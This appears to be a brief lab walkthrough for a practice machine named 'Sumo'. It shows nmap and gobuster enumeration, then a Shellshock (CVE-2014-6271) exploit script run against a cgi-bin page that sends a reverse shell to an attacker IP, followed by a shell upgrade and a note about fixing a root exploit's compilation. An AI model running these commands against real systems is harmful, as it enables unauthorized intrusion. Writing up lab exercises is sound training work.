🐧Sumo
192.168.84.87
Enumeration
sudo nmap 192.168.57.87 -sV -A -p-
Port 80
Gobuster
gobuster dir -k -u http://192.168.234.87:80 -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txtNikto Scan
Metasploit is garbage use https://github.com/b4keSn4ke/CVE-2014-6271
./shellshock.py 192.168.8487 7898 http://192.168.234.87:80/cgi-bin/test.shShell
Get a decent shell :
python -c 'import pty; pty.spawn("/bin/bash")'
Could not get this exploit to compile to save my life. Tried python and c. Had to look at a hint.
After going back and researching this gcc error was happened because gcc was not added to path.
Used fix from https://blog.gibbons.digital/hacking/2021/05/04/stuff.html The exploit now compiles.
Root
Last updated
Was this helpful?